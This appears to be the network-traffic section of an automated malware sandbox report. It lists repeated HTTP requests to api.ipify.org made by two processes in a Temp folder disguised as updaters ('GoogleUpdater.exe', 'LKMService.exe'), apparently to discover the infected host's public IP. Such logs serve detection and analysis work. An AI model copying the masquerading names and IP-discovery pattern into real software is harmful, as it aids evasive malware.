                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          19192.168.2.658613104.26.12.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:32.878698111 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:33.348047972 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:33 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c8d40e6e17a9-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          20192.168.2.658626104.26.12.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:46.936383009 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:47.403070927 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:47 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c92bec48420b-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          21192.168.2.658630104.26.12.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:48.571933985 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:49.033509016 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:48 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9361cc0c463-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          22192.168.2.658634104.26.12.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:50.692169905 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          23192.168.2.658637104.26.12.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:51.770695925 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:52.243443012 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:52 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c94a19ac42a0-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          24192.168.2.658641104.26.12.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:53.221775055 CEST39OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Oct 2, 2024 14:44:53.706156969 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:44:53 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9533bed8c1d-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          25192.168.2.658649104.26.12.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:00.790122032 CEST39OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:01.280355930 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:01 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c982981a4398-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          26192.168.2.658651104.26.12.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:02.332997084 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:02.838332891 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:02 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c98c4cb78cbf-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          27192.168.2.658654104.26.12.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:04.957202911 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:05.427841902 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:05 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c99c8d1341fe-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          28192.168.2.658655104.26.12.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:05.096117973 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:05.585911036 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:05 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c99d8bdb43df-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          29192.168.2.658658104.26.12.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:06.368299007 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:06.829298973 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:06 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9a54ffdc342-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          30192.168.2.658659104.26.12.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:06.553623915 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:07.019565105 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:06 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9a688af7d1e-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          31192.168.2.658664104.26.12.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:09.371778965 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:09.850611925 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:09 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9b82f607293-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          32192.168.2.658665104.26.12.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:09.626271009 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:10.085175037 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:10 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9b9a91f7283-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          33192.168.2.658668104.26.12.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:12.956737041 CEST39OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:13.406915903 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:13 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9ce78120f8b-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          34192.168.2.658670104.26.12.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:14.274765015 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:14.787942886 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:14 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9d70d74c411-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          35192.168.2.658673104.26.12.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:17.502944946 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:17.983563900 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:17 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9eafdcc9e16-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:18.199496031 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:17 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9eafdcc9e16-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          36192.168.2.658675104.26.12.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:18.441167116 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:18.904762030 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:18 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9f0cdff43ca-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          37192.168.2.658677104.26.12.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:18.965730906 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:19.443984985 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:19 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c9f42ea48c71-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          38192.168.2.658679104.26.12.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:19.726836920 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          39192.168.2.658681104.26.12.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:21.405697107 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          40192.168.2.658683104.26.12.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:29.926863909 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:30.410228014 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:30 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4ca38acfbc34f-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          41192.168.2.658685104.26.12.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:31.428797960 CEST39OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:31.885509014 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:31 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4ca41ecc07d0c-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          42192.168.2.658687104.26.12.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:34.245225906 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:34.721808910 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:34 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4ca539ac98c7b-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          43192.168.2.658689104.26.12.205804340C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:35.693109989 CEST39OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:36.184148073 CEST227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:45:36 GMT
                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                          Content-Length: 11
                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4ca5cbbd94394-EWR
                                                                                                                                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          44192.168.2.658692104.26.12.205806320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          Oct 2, 2024 14:45:43.836296082 CEST63OUTGET / HTTP/1.1
                                                                                                                                                                                                                                          Host: api.ipify.org
                                                                                                                                                                                                                                          Connection: Keep-Alive
